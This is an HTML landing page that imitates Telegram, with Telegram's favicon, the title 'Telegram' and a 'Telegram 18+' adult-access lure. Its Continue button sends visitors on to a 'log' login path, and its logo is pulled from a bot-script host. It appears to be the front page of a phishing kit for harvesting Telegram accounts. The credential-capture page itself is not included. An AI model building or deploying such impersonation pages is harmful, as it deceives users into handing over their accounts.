<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;600&display=swap"
      rel="stylesheet"
    />
    <link
      rel="icon"
      href="https://web.telegram.org/z/favicon.svg"
      type="image/svg+xml"
    />
    <title>Telegram</title>
  </head>
  <body>
    <section class="container">
      <div class="logo"></div>
      <div class="txt">
        <h1>Telegram 18+</h1>
        <p>Continue with your profile to access Telegram for adults.</p>
      </div>
      <div>
        <button onclick="redirectToLogin()" class="next">Continue</button>
      </div>
    </section>

    <script>
      function redirectToLogin() {
        window.location.href = window.location.href + "log"
      }
    </script>

    <style>
      body {
        background-color: #212121;
        font-family: "Poppins", sans-serif;
      }

      .logo {
        background: url(http://ebot.one/all/bots/source_script/77639817/geek_love_bot/img/logo.png)
          center no-repeat;
        background-size: 100%;
        height: 150px;
        width: 150px;
      }

      .container {
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        margin-top: 1%;
        text-align: center;
      }

      .txt h1 {
        color: white;
        font-size: 2rem;
      }

      .txt p {
        font-size: 1rem;
        color: rgb(170, 170, 170);
        width: 360px;
      }

      .input {
        background-color: #212121;
        border: 1px solid rgb(170, 170, 170);
        border-radius: 12px;
        box-sizing: border-box;
        color: #eee;
        font-size: 18px;
        height: 100%;
        outline: 0;
        padding: 4px 20px 0;
        width: 100%;
      }

      .next {
        width: 320px;
        padding-top: 13px;
        padding-bottom: 13px;
        background-color: rgb(135, 116, 225);
        color: white;
        text-transform: uppercase;
        border-radius: 12px;
        margin-top: 15px;
        height: 100%;
        cursor: pointer;
        border: 0;
        transition: 0.3s;
        font-size: 15px;
      }

      .next:hover {
        background-color: rgb(93, 66, 202);
        border: 0;
        transition: 0.3s;
      }
    </style>
  </body>
</html>
